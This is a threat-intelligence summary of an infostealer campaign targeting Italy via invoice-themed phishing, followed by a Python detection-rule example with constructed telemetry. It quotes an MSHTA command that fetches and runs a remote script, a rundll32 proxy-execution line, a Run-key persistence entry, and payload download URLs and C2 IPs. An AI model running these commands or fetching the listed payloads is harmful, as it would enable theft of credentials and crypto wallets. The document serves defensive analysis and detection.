Infostealer Malware: Targeting the Italian Region

The campaign targets Italy with phishing emails carrying a password-protected ZIP named “IT_Fattura_n99392.zip” to drop an infostealer payload. It uses a multi-stage chain (LNK and BAT files) and a PowerShell/MSHTA/Rundll32 sequence to download and execute components that exfiltrate system, browser, and crypto-wallet data. Hashtags: #Infostealer #Italy #IT_Fattura_n99392.zip #GitHub #Dropbox

Keypoints

  • The phishing campaign is geo-targeted at Italy and delivered via spam/phishing emails with the subject “Invoice.”
  • The infostealer steals system information, browser data (cookies, bookmarks, credentials), and crypto wallet data.
  • An initial infection uses a password-protected ZIP containing Fattura-related files; the LNK file leads to a BAT that downloads the payload from GitHub.
  • The attack chain employs MSHTA to run a script from a URL, a VBScript that decrypts in memory and launches PowerShell commands.
  • The malware uses rundll32 to launch a legitimate-looking component and drops additional binaries (e.g., start.exe, lib32.exe) to execute payloads.
  • Persistence is achieved via a Run Registry key, and targeted crypto wallets include Dash, Bitcoin, Ethereum, Monero, and others.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – The attacker delivered emails through spam or phishing mail with a password-protected ZIP named “IT_Fattura_n99392.zip.” Quote: “Upon clicking the link, which comes through spam email, a password-protected ZIP file named "IT_Fattura_n99392.zip" is downloaded into the local system.”
  • [T1218.005] Signed Binary Proxy Execution: MSHTA – The VBScript is invoked via MSHTA to run code from a URL. Quote: “it launches powershell.exe and it tries to run the script file directly from the URL using MSHTA.”
  • [T1218.011] Signed Binary Proxy Execution: Rundll32 – The malware uses rundll32 to execute a DLL for rendering/launch. Quote: “"C:\Windows\System32\rundll32.exe" "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\ProgramData\image.png”
  • [T1105] Ingress Tool Transfer – The payloads are downloaded from remote sources (GitHub) during execution. Quote: “start.exe downloads binary payloads from github which get dropped in %appdata%\Roaming\wininfo64\lib32.exe”
  • [T1555.003] Credentials in Web Browsers – The trojan exfiltrates browser data (cookies, bookmarks, credentials). Quote: “The trojan steals information such as cookies, bookmarks, credit cards, downloads, and credentials from browsers by comparing the hardcoded browser list.”
  • [T1547.001] Registry Run Keys/Startup Folder – The malware creates an auto-start entry in the Run key. Quote: “HKU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EAC_Update: "C:\Users\AppData\Roaming\wininfo64\lib32.exe"”
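As an added example (not part of the Uptycs write-up), the following detection logic turns the chain described above into host-telemetry rules: MSHTA fetching a script from a URL, rundll32 abusing PhotoViewer.dll to open a file under C:\ProgramData, the EAC_Update Run key, and the IPs and MD5 hashes quoted on this page. The event dictionaries, the username "alice" and the SID are constructed sample telemetry, not data from the report.

```python
import re

# Indicators quoted on this page; the sample events below are constructed.
KNOWN_MD5 = {"325aae0178932659c1d89a49328066a6", "6fff73f5118cee25cf496fbd192aa940"}
BAD_HOSTS = {"116.203.19.97", "195.201.23.210"}

# Each rule: (MITRE technique, rule name, predicate over one normalized event).
RULES = [
    ("T1218.005", "mshta_remote_script",
     lambda e: e["image"].lower().endswith("mshta.exe")
               and re.search(r"https?://", e["cmd"], re.I)),
    # Photo Viewer via rundll32 is normal; an image under ProgramData is the odd part.
    ("T1218.011", "rundll32_photoviewer_programdata",
     lambda e: e["image"].lower().endswith("rundll32.exe")
               and "photoviewer.dll" in e["cmd"].lower()
               and "imageview_fullscreen" in e["cmd"].lower()
               and "\\programdata\\" in e["cmd"].lower()),
    ("T1547.001", "run_key_eac_update",
     lambda e: e["type"] == "registry"
               and "\\currentversion\\run\\" in e["key"].lower()
               and ("eac_update" in e["key"].lower()
                    or "wininfo64\\lib32.exe" in e["value"].lower())),
    ("T1105", "known_c2_host", lambda e: any(h in e["cmd"] for h in BAD_HOSTS)),
    ("IOC", "known_md5", lambda e: e["md5"].lower() in KNOWN_MD5),
]

def evaluate(events):
    """Return [(event index, technique, rule name)] for every rule an event trips."""
    hits = []
    for i, raw in enumerate(events):
        e = {"type": "process", "image": "", "cmd": "", "key": "", "value": "", "md5": ""}
        e.update(raw)  # missing fields default to empty so predicates never KeyError
        hits.extend((i, tech, name) for tech, name, pred in RULES if pred(e))
    return hits

# Constructed events modelled on the chain in the write-up (event 3 is benign).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe", "cmd": "mshta.exe http://116.203.19.97/1/lib32.hta"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r'"C:\Windows\System32\rundll32.exe" "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\ProgramData\image.png'},
    {"type": "registry", "value": r"C:\Users\alice\AppData\Roaming\wininfo64\lib32.exe",
     "key": r"HKU\S-1-5-21-1111-2222-3333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EAC_Update"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r'rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\alice\Pictures\cat.png'},
    {"image": r"C:\Users\alice\AppData\Roaming\wininfo64\lib32.exe", "cmd": "lib32.exe",
     "md5": "325aae0178932659c1d89a49328066a6"},
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

The benign Photo Viewer launch (event 3) produces no hit, which is the point of keying the rundll32 rule on the ProgramData path rather than on PhotoViewer.dll alone.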

Indicators of Compromise

  • [File name] context – IT_Fattura_n99392.zip, Fattura 06-12-2022.lnk, and Fattura_IT9032003.bat
  • [MD5 hash] context – 325aae0178932659c1d89a49328066a6, 6fff73f5118cee25cf496fbd192aa940
  • [Domain/URL] context – https://dl.dropboxusercontent.com/s/52eq2p19vc0dcei/IT_Fattura_n99392.zip, http://116.203.19.97/1/lib32.hta
  • [Domain/URL] context – http://116.203.19.97/1/Fattura_IT9032003.bat, https://github.com/NET-FrameWork-x64/NET/raw/main/NETFramework.zip
  • [Domain/URL] context – https://github.com/alibaba2044/hauL2/raw/main/wininfo64.zip
  • [IP address] context – 195.201.23.210
  • [File name] context – image.png, NETFramework.zip, start.exe, lib32.exe, Ejefqnxog.dll(Memory)

Read more: https://www.uptycs.com/blog/infostealer-malware-attacks-targeting-italian-region/